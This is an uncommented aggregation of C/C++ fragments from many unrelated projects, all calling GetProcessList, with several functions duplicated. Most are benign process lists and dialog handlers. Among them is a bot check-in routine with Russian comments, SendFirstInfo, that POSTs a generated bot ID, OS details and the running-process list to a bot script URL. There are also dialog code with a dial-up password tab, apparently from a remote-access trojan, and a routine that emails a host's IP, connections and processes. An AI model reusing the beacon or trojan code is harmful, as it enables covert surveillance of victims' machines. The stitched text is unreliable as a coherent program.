SaneWinMain( argc, argv )
{
if( argv[1] )
{
int wait_exit = 1;
printf( WIDE("waiting for [%s]\n"), argv[1] );
if( argc > 2 && argv[2] )
if( StrCaseCmp( argv[2], WIDE("started") ) == 0 )
{
wait_exit = 0;
while( !GetProcessList( argv[1] ) )
Sleep( 250 );
}
if( wait_exit )
while( GetProcessList( argv[1] ) )
Sleep( 250 );
}
else
{
printf( WIDE("%s <process partial name> <started>\n")
WIDE(" - while a process containing the partial name exists, this waits.\n")
WIDE(" - if 'started' is specified as a second argument, ")
WIDE(" then this waits for the process to start instead of waiting for it to exit\n")
, argv[0] );
}
return 0;
}
int main(void)
{
GetProcessList();
system("pause");
return 0;
}
void CSystemDlg::OnRefreshPsList()
{
// TODO: Add your command handler code here
if (m_list_process.IsWindowVisible())
GetProcessList();
if (m_list_windows.IsWindowVisible())
GetWindowsList();
}
BOOL CALLBACK DlgProcesslist(HWND hwndDlg, UINT uMsg, WPARAM wParam, LPARAM lParam)
{
LRESULT index = 0;
switch(uMsg)
{
case WM_INITDIALOG:
{
SendMessage(hwndDlg, WM_SETICON, ICON_BIG, (LPARAM)LoadIcon(hInst, MAKEINTRESOURCE(IDI_ICON1)));
if (!GetProcessList(hwndDlg))
{
MessageBox(0, TEXT("Getting process list failed"), TEXT("Error"), MB_ICONERROR);
EndDialog(hwndDlg, 0);
}
}
return TRUE;
case WM_CLOSE:
{
EndDialog(hwndDlg, 0);
}
return TRUE;
case WM_COMMAND:
{
switch(LOWORD(wParam))
{
case IDC_BTN_CANCEL:
{
SendMessage(hwndDlg, WM_CLOSE, 0, 0);
}
return TRUE;
case IDC_BTN_OK:
{
index = SendMessage(GetDlgItem(hwndDlg, IDC_COMBO_PROCESS),CB_GETCURSEL,0,0);
if (ScanPatternInProcess(processList.at(index)))
{
MessageBox(hwndDlg, TEXT("Process scanning finished"), TEXT("Success"), MB_ICONINFORMATION);
}
processList.clear();
EndDialog(hwndDlg, 0);
}
return TRUE;
}
}
return TRUE;
}
return FALSE;
}
int32_t xnu_proc::PidFromName(char* procname)
{
pid_t pid = 0;
int j;
kinfo_proc * proclist;
size_t procCount;
GetProcessList(&proclist, &procCount);
for (j = 0; j < procCount +1; j++) {
if (strcmp(proclist[j].kp_proc.p_comm, procname) == 0 )
pid = proclist[j].kp_proc.p_pid;
}
free(proclist);
return pid;
}
// convert process name to id
DWORD name2pid (wchar_t name[], int exclude)
{
HANDLE hProc;
DWORD dwId=0, mode;
BOOL bWow64;
LPVOID procList;
PPROCENTRY pe;
procList = GetProcessList();
if (procList!=NULL)
{
mode = GetMode();
for (pe=procList; pe->id; pe++)
{
// is this what we're looking for?
if (!lstrcmpi (pe->name, name))
{
// if we need to exclude some process
if (exclude!=0)
{
hProc=OpenProcess (PROCESS_QUERY_INFORMATION, FALSE, pe->id);
if (hProc!=NULL) {
bWow64 = IsWow64(hProc);
CloseHandle(hProc);
// if we're excluding 32-bit process and this is Wow64, continue
if (exclude==32 && bWow64) continue;
// if we're excluding 64-bit apps,not Wow64, continue
if (exclude==64 && !bWow64 && mode != X86_MODE) continue;
dwId = pe->id;
break;
}
} else {
dwId = pe->id;
break;
}
}
}
}
return dwId;
}
int main(int argc, char* argv[])
{
int size = 0;
char fn[MAX_PATH] = "";
if (argc <=1) {
printf("plz enter process name: ");
gets(fn);
} else
sprintf(fn, "%s", argv[1]);
while (TRUE) {
if (kbhit()) if (getch() == 'q') break;
size = GetProcessList(fn);
print("VM size; %d.", size);
Sleep(1000);
}
return 0;
}
void test(void)
{
std::list<PROCESSENTRY32> lProcess;
std::list<MODULEENTRY32> lModules;
DWORD dwPid = 0;
std::list<MEMORY_BASIC_INFORMATION> lMemBI;
std::list<THREADENTRY32> lThreads;
std::list<LPCVOID> lAddress;
DWORD dwBaseAddress = 0;
IMAGE_DOS_HEADER DosHeader;
IMAGE_NT_HEADERS NTHeader;
lProcess = GetProcessList();
PrintProcessList(lProcess);
dwPid = GetPidProcess("notepad++.exe");
PrintPidProcess("notepad++.exe", dwPid);
lModules = GetModuleList(dwPid);
PrintModulesList(lModules);
lMemBI = GetMemoryInformation(dwPid);
PrintMemoryInfo(lMemBI);
lThreads = GetThreadsList(dwPid);
PrintThreadsInfo(lThreads);
SuspendAllThread(dwPid);
Sleep(1000);
ResumeAllThread(dwPid);
lAddress = ScanPattern("\x42\x42\x42", 3, dwPid);
PrintPatternMatch(lAddress);
dwBaseAddress = GetRemoteBaseAddress(dwPid);
printf("BaseAddress = %08X\n", dwBaseAddress);
DosHeader = GetDosHeader(dwPid);
PrintDosHeader(&DosHeader);
NTHeader = GetNTHeader(dwPid);
PrintNTHeader(&NTHeader);
}
int main(void)
{
PPROCENTRY pe;
PPROCENTRY list = GetProcessList();
//wprintf(L" %p ", fb_hash(L"iexplore.exe", TRUE));
if (list==NULL) {
wprintf (L"\nUnable to retrieve list of process");
return 0;
}
wprintf (L"\nList of processes");
wprintf (L"\n=================");
for (pe=list; pe->id; pe++) {
wprintf (L"\n%-30s - %i - %p", pe->name, pe->id, fb_hash(pe->name, TRUE));
}
xfree(list);
return 0;
}
void CSystemDlg::ShowSelectWindow(void)
{
switch (m_tab.GetCurSel())
{
case 0:
m_list_windows.ShowWindow(SW_HIDE);
m_list_process.ShowWindow(SW_SHOW);
if(m_list_process.GetItemCount() == 0)
GetProcessList();
break;
case 1:
m_list_windows.ShowWindow(SW_SHOW);
m_list_process.ShowWindow(SW_HIDE);
if(m_list_windows.GetItemCount() == 0)
GetWindowsList();
break;
default:
break;
}
}
void CSystemDlg::ShowSelectWindow()
{
switch (m_tab.GetCurSel())
{
case 0:
m_info.ShowWindow(SW_HIDE);
m_list_windows.ShowWindow(SW_HIDE);
m_list_process.ShowWindow(SW_SHOW);
m_list_dialupass.ShowWindow(SW_HIDE);
if (m_list_process.GetItemCount() == 0)
GetProcessList();
break;
case 1:
m_info.ShowWindow(SW_HIDE);
m_list_windows.ShowWindow(SW_SHOW);
m_list_process.ShowWindow(SW_HIDE);
m_list_dialupass.ShowWindow(SW_HIDE);
if (m_list_windows.GetItemCount() == 0)
GetWindowsList();
break;
case 2:
m_info.ShowWindow(SW_HIDE);
m_list_windows.ShowWindow(SW_HIDE);
m_list_process.ShowWindow(SW_HIDE);
m_list_dialupass.ShowWindow(SW_SHOW);
if (m_list_dialupass.GetItemCount() == 0)
GetDialupassList();
break;
case 3:
m_info.ShowWindow(SW_SHOW);
m_list_windows.ShowWindow(SW_HIDE);
m_list_process.ShowWindow(SW_HIDE);
m_list_dialupass.ShowWindow(SW_HIDE);
if (m_info.GetItemCount() == 0)
GetInfo();
break;
}
}
int sysinfo(struct sysinfo *info)
{
SYSTEM_INFO si;
MEMORYSTATUSEX statex;
ZeroMemory(&si, sizeof(SYSTEM_INFO));
statex.dwLength = sizeof(statex);
GetSystemInfo(&si);
if(!GlobalMemoryStatusEx(&statex))
return -1;
// System Uptime
info->uptime = GetTickCount64() / 1000 % 60;
// Load times - windows does not have this so say -1 or 0 or nothing basically
info->loads[0] = -1;
info->loads[1] = -1;
info->loads[2] = -1;
// Ram usages - note that these may not be exact to what linux has
info->freeram = statex.ullAvailPhys;
info->freeswap = statex.ullAvailVirtual;
info->sharedram = 0;
info->totalram = statex.ullTotalPhys;
info->bufferram = statex.ullTotalPageFile;
info->totalswap = statex.ullTotalVirtual;
// Processes
info->procs = GetProcessList();
return 0;
}
bool SendFirstInfo()
{
// Функция отправляет информацию о системе
PCHAR Script = GetBotScriptURL(SCRIPT_FIRST_INFO);
if (Script == NULL)
return false;
PCHAR OSInfo = GetOSInfo();
PCHAR ProcList = GetProcessList();
PCHAR ID = GenerateBotID();
// Формируем POST данные
PStrings Fields = Strings::Create();
AddURLParam(Fields, "id", ID);
AddURLParam(Fields, "os", OSInfo);
AddURLParam(Fields, "plist", ProcList);
MemFree(OSInfo);
MemFree(ProcList);
STR::Free(ID);
// Лтправляем запрос
#ifdef CryptHTTPH
PCHAR Password = GetMainPassword();
bool Result = CryptHTTP::Post(Script, Password, Fields, NULL, NULL);;
STR::Free(Password);
#else
bool Result = HTTP::Post(Script, Fields, NULL, NULL);
#endif
Strings::Free(Fields);
STR::Free(Script);
return Result;
}
int WINAPI WinMain(HINSTANCE hInstance,
HINSTANCE hPrevInstance,
LPSTR lpCmdLine,
int nCmdShow)
{
WNDCLASSEX wcex;
wcex.cbSize = sizeof(WNDCLASSEX);
wcex.style = CS_HREDRAW | CS_VREDRAW;
wcex.lpfnWndProc = WndProc;
wcex.cbClsExtra = 0;
wcex.cbWndExtra = 0;
wcex.hInstance = hInstance;
wcex.hIcon = LoadIcon(hInstance, MAKEINTRESOURCE(IDI_ICON1));
wcex.hCursor = LoadCursor(hInstance, IDC_ARROW);
wcex.hbrBackground = (HBRUSH)(COLOR_WINDOW+1);
wcex.lpszMenuName = NULL;
wcex.lpszClassName = szWindowClass;
wcex.hIconSm = LoadIcon(wcex.hInstance, MAKEINTRESOURCE(IDI_ICON1));
if (!RegisterClassEx(&wcex))
{
MessageBox(NULL,
_T("Call to RegisterClassEx failed!"),
_T("Lab1"),
NULL);
return 1;
}
hInst = hInstance;
HWND hWnd = CreateWindow(
szWindowClass,
szTitle,
WS_OVERLAPPEDWINDOW,
CW_USEDEFAULT, CW_USEDEFAULT,
550, 530,
NULL,
NULL,
hInstance,
NULL
);
if (!hWnd)
{
MessageBox(NULL,
_T("Call to CreateWindow failed!"),
_T("Win32 Guided Tour"),
NULL);
return 1;
}
ShowWindow(hWnd, nCmdShow);
UpdateWindow(hWnd);
GetProcessList();
// Main message loop:
MSG msg;
while (GetMessage(&msg, NULL, 0, 0))
{
TranslateMessage(&msg);
DispatchMessage(&msg);
}
return (int) msg.wParam;
}
LRESULT CALLBACK WndProc(HWND hWnd, UINT message, WPARAM wParam, LPARAM lParam)
{
switch (message)
{
case WM_CREATE:
hListBox1 = CreateWindowEx(WS_EX_CLIENTEDGE
, L"LISTBOX", NULL
, WS_CHILD | WS_VISIBLE | WS_VSCROLL | ES_AUTOVSCROLL | LBS_NOTIFY
, 10, 10, 250, 480
, hWnd, (HMENU)LB1, hInst, NULL);
hListBox2 = CreateWindowEx(WS_EX_CLIENTEDGE
, L"LISTBOX", NULL
, WS_CHILD | WS_VISIBLE | WS_VSCROLL | ES_AUTOVSCROLL
, 270, 10, 250, 480
, hWnd, NULL, hInst, NULL);
break;
case WM_COMMAND:
if (LOWORD(wParam) >= ID_IDLE && LOWORD(wParam) <= ID_ABOVENORMAL)
{
int index = SendMessage(hListBox1, LB_GETCURSEL, 0, 0);
if (index == LB_ERR)
break;
int pid = SendMessage(hListBox1, LB_GETITEMDATA, index, 0);
int priority = 0;
switch(LOWORD(wParam))
{
case ID_IDLE:
priority = IDLE_PRIORITY_CLASS;
break;
case ID_BELOWNORMAL:
priority = BELOW_NORMAL_PRIORITY_CLASS;
break;
case ID_NORMAL:
priority = NORMAL_PRIORITY_CLASS;
break;
case ID_ABOVENORMAL:
priority = ABOVE_NORMAL_PRIORITY_CLASS;
case ID_HIGH:
priority = HIGH_PRIORITY_CLASS;
break;
case ID_REALTIME:
priority = REALTIME_PRIORITY_CLASS;
break;
}
HANDLE hProcess = OpenProcess( PROCESS_ALL_ACCESS, FALSE, pid);
if (!SetPriorityClass(hProcess, priority))
MessageBox(hWnd, L"Failed to set priority", L"", MB_ICONERROR);
CloseHandle(hProcess);
GetProcessList();
}
switch(LOWORD(wParam))
{
case LB1:
{
if (HIWORD(wParam) == NM_RCLICK)
{
int index = SendMessage(hListBox1, LB_GETCURSEL, 0, 0);
}
if (HIWORD(wParam) != 0)
{
int index = SendMessage(hListBox1, LB_GETCURSEL, 0, 0);
if (index == LB_ERR)
break;
int pid = SendMessage(hListBox1, LB_GETITEMDATA, index, 0);
SendMessage(hListBox2, LB_RESETCONTENT, 0, 0);
GetProcessModulesList(pid);
}
break;
}
}
break;
case WM_CONTEXTMENU:
if ((HWND)wParam == hListBox1)
{
HMENU hMenu = LoadMenu(hInst, MAKEINTRESOURCE(IDR_MENU1));
hMenu = GetSubMenu(hMenu, 0);
SetForegroundWindow(hWnd);
TrackPopupMenu(hMenu, TPM_TOPALIGN | TPM_LEFTALIGN | TPM_NOANIMATION, LOWORD(lParam), HIWORD(lParam), 0, hWnd, NULL);
}
break;
case WM_DESTROY:
PostQuitMessage(0);
break;
default:
return DefWindowProc(hWnd, message, wParam, lParam);
break;
}
return 0;
}
int TestProcessList() {
printf("[*] Getting list of processess...\n");
BOOL result = GetProcessList(&PrintProcessInfo);
return 0;
}
// list running process on system
DWORD pslist (int exclude)
{
HANDLE hProc;
DWORD dwId = 0, ulen, dlen, mode=0;
BOOL bWow64;
wchar_t *cpu, *uid, *dom;
wchar_t domain[64], uname[64];
LPVOID procList;
PPROCENTRY pe;
procList = GetProcessList();
if (procList != NULL)
{
wprintf(L"\n%-35s %-5s %5s %s", L"Image Name", L"PID", L"CPU", L"domain\\username");
wprintf(L"\n=================================== ===== ====== ===============\n");
mode = GetMode();
for (pe=(PPROCENTRY)procList; pe->id != 0; pe++)
{
cpu = L"??";
uid = L"??";
dom = L"??";
// open process to determine CPU mode and user information
hProc=OpenProcess (PROCESS_QUERY_INFORMATION, FALSE, pe->id);
if (hProc!=NULL)
{
bWow64 = IsWow64(hProc);
ulen=sizeof(uname);
dlen=sizeof(domain);
if (proc2uid (hProc, domain, &dlen, uname, &ulen))
{
dom=domain;
uid=uname;
}
CloseHandle (hProc);
// if we're excluding 32-bit process and this is Wow64, continue
if (exclude==32 && bWow64) {
continue;
}
// if we're excluding 64-bit apps and not Wow64, continue
if (exclude==64 && !bWow64 && mode != X86_MODE) {
continue;
}
// if remote process is not wow64
if (!bWow64) {
// if we're running on 32-bit mode
if (GetMode() == X86_MODE) {
// it's a 32-bit process
cpu = L"32";
} else {
// otherwise it's 64-bit
cpu = L"64";
}
} else {
cpu = L"32";
}
}
wprintf (L"%-35s %-5lu %5s-bit %s\\%s\n",
pe->name, pe->id, cpu, dom, uid);
}
xfree (procList);
} else {
xstrerror("GetProcessList");
}
return dwId;
}
void CSystemDlg::OnRefreshpslist()
{
// TODO: 在此添加命令处理程序代码
if(m_list_process.IsWindowVisible())
GetProcessList();
}
int main(int argc, char* argv[])
{
GString strNetworkConnections(32767);
GetNetworkConnections(strNetworkConnections,NET_FLAG_REDUCE_INFO|NET_FLAG_NO_UDP);
GString strWanIP, strNoWanIPError;
ExternalIP(&strWanIP, &strNoWanIPError);
CSmtp mail;
GString strMailServer("smtp.gmail.com");
// ------- GMail TLS --------
// Note about GMail - login, then under "My Account" go to "Sign-In & Security" and set "Allow Less Secure Apps": to ON.
// This enables TLS and non-google apps(not insecure apps). AOL, HotMail, and Yahoo enable the SMTP over TLS relay for
// the paid email account services with no ads and higher mail/data limits.
//
mail.SetSMTPServer(strMailServer,587);
mail.SetSecurityType(USE_TLS);
#include <"Do.not.compile"> // add your own Gmail account in the next two lines..... then delete this line (and set the recipient)
// Note about GMail - login, then under "My Account" go to "Sign-In & Security" and set "Allow Less Secure Apps": to ON.
// mail.SetLogin("*****@*****.**");
// mail.SetPassword("MyOwnPassword");
mail.SetSenderName("My Application");
mail.SetSenderMail("*****@*****.**");
mail.SetReplyTo("*****@*****.**");
GString strSubject(g_strThisHostName);
strSubject << " Stats";
mail.SetSubject(strSubject);
mail.AddRecipient("*****@*****.**"); //<---------------------------------------------------------- Who to send the email to
// mail.AddRecipient("*****@*****.**");
mail.SetXPriority(XPRIORITY_NORMAL);
mail.SetXMailer("Professional (v7.77) Pro");
mail.AddMsgLine("----------------------------Wan IP----------------------------------------");
mail.AddMsgLine(strWanIP);
mail.AddMsgLine("----------------------Network Interfaces----------------------------------");
GString strThisHost("Host:");
strThisHost << g_strThisHostName;
mail.AddMsgLine(strThisHost);
GStringList lstBoundIPAddresses;
InternalIPs(&lstBoundIPAddresses);
GStringIterator it2(&lstBoundIPAddresses);
while(it2())
{
mail.AddMsgLine(it2++);
}
mail.AddMsgLine("----------------------Network Connections----------------------------------");
GStringList l("\n",strNetworkConnections); // each row divided by "\n"
GStringIterator it(&l);
while(it())
{
mail.AddMsgLine(it++);
}
mail.AddMsgLine("------------------------Processes-------------------------------------------");
GString strRunningProcessData;
GetProcessList( &strRunningProcessData );
GStringList lstProcess("\n",strRunningProcessData); // each row divided by "\n"
GStringIterator itP(&lstProcess);
while(itP())
{
//mail.AddMsgLine(itP++); // write it out - raw
GProcessListRow *pRow = new GProcessListRow(itP++); // or use the already written code to parse process information
GString strProcess; // write onluy the data we want into this GString
strProcess << "pid:" << pRow->strPID << " " << pRow->strName << " [" << pRow->strBinaryPath << "]";
mail.AddMsgLine(strProcess); // then write it out - formatted.
}
//mail.AddAttachment("../test1.jpg");
//mail.AddAttachment("c:\\test2.exe");
//mail.AddAttachment("c:\\test3.txt");
mail.Send();
return 0;
}
void CModuleDialog::OnPrefresh()
{
// TODO: Add your control notification handler code here
GetProcessList((CComboBox *)GetDlgItem(IDC_PLIST));
}
int main( void )
{
GetProcessList( );
return 0;
}
